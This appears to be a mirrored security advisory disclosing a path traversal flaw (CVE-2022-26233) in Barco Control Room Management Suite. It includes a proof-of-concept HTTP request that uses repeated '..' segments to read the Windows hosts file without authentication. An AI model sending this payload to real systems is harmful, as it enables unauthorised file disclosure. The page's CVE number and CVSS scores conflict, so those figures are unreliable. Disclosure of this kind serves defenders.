Lucene search

K
zdtMurat Aydemir1337DAY-ID-37579
HistoryApr 06, 2022 - 12:00 a.m.

Barco Control Room Management Suite Directory Traversal Vulnerability

2022-04-0600:00:00
Murat Aydemir
0day.today
221

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

*I. SUMMARY*
Title: [CVE-2022-2623] Barco Control Room Management Suite File Path
Traversal Vulnerability
Product: Barco Control Room Management Suite before 2.9 build 0275 and all
prior versions
Vulnerability Type: File Path Traversal
Credit by/Researcher: Murat Aydemir from Accenture Cyber Security Team
(Prague CFC)
Contact: https://twitter.com/mrtydmr75
Github: https://github.com/murataydemir

*II. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES*
CVE Number: CVE-2022-26233
CVSSv3: Base score: 7.5 Impact 3.6 Exploitability: 3.9
CVSSv3 Vector: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
Vulnerability Type: File Path Traversal
CWE ID: CWE-22 Improper Limitation of a Pathname to a Restricted Directory
('Path Traversal')

*III. PROOF OF CONCEPT (POC) FOR CVE-2022-26233*
Due to lack of input sanitizing inputs which come from url, an application
is vulnerable to file path traversal vulnerability. A succesfully
exploitation of this vulnerability could lead to access/read files and
directories stored on file system including application source code or
configuration and critical system files. No authentication is required to
exploit this vulnerability. An attacker who is not logged into the
application can easily exploit this vulnerability.

GET /..\..\..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts
HTTP/1.1
Host: vulnerablehost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0)
Gecko/20100101 Firefox/81.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

[image: file-path-traversal.PNG]

*IV. REFERENCE(S)*
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26233
https://nvd.nist.gov/vuln/detail/CVE-2022-26233
https://www.barco.com/en/support/knowledge-base/kb115*XX*

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N